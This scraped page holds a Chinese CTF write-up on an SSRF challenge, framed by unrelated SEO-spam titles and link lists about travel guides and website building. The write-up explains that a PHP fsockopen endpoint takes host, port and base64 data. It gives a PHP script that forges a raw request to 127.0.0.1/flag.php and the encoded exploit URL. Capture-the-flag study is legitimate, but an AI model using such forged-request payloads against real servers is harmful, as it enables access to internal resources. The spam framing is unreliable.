当前位置: 首页 > news >正文

大连旅顺一日游攻略seo查询是什么

大连旅顺一日游攻略,seo查询是什么,网上购物系统代码,广东建设工程网站这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察 本题是需要我们去伪造一个ssrf的请求头去绕过 题目开始给了我们信息让我们去访问index.php fsockopen函数触发ssrf fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 bas…

这题主要是引入ssrf这个漏洞攻击,本质上没有更深入的考察

本题是需要我们去伪造一个ssrf的请求头去绕过

题目开始给了我们信息让我们去访问index.php

fsockopen函数触发ssrf

fsockopen() 函数建立与指定主机和端口的 socket 连接。然后,它将传入的 base64 编码的数据解码,并将数据写入到连接的 socket 中。

通过了解知道fsockopen函数就要清楚有考察ssrf的意思,需要往这个方向去想

之后就是利用poc构建脚本

<?php
$out = "GET /flag.php HTTP/1.1\r\n";
$out .= "Host: 127.0.0.1\r\n";
$out .= "Connection: Close\r\n\r\n";
echo base64_encode($out);
?>

得到data,host为127.0.0.1,port为80

之后就是构建url

GET /flag.php HTTP/1.1
Host: 127.0.0.1
Connection: Close

用base64加密然后构建url编码

/index.php?host=127.0.0.1&port=80&data=R0VUIC9mbGFnLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBDbG9zZQ0KDQo=

http://www.tj-hxxt.cn/news/46326.html

相关文章:

  • 做magento网站武汉竞价托管公司
  • 营口网站建设开发制作网站建设公司seo关键词
  • 南京企业做网站上海何鹏seo
  • 可信赖的南昌网站建设友情链接查询结果
  • 搜索引擎排名谷歌志鸿优化设计
  • 织梦万网网站搬家教程推广app有哪些
  • 南平网站开发贵州seo和网络推广
  • 网站中在线咨询怎么做我有广告位怎么找客户
  • 台州网站优化排名长沙sem培训
  • 网站优化 合同软件开发培训机构排名
  • 网站建设学多久百度官方免费下载安装
  • 个人做论坛网站需要哪些备案百度热搜大数据
  • 开发个网站多少钱seo营销论文
  • 家政公司网站怎么做杭州网络优化公司排名
  • 网站优化方案基本流程推广平台排名
  • 网站建设开发三层架构fifa最新排名出炉
  • wordpress网页版入口网站关键词优化外包
  • 电子商务网站规划从哪些方面入手国外媒体报道
  • 四川林峰脉建设工程有限公司网站常州百度推广代理
  • 高端医疗网站模板免费下载广告网络推广怎么做
  • 网站系统报价方案模板下载免费网站搭建平台
  • 做游戏任务赚钱的网站seo网站推广
  • 网站需要续费吗wordpress免费网站
  • 智慧团建重置密码验证码seo营销方案
  • 网络专业的网站建设网站排名靠前方法
  • 四川住房和城乡建设部网站官网品牌宣传推广方案
  • 万网有跟企业做网站吗杭州网站优化公司
  • 家用宽带做网站爱站工具网
  • 秦皇岛做网站seo的友情链接交换教程
  • 顺德网站建设公司价格近期国内新闻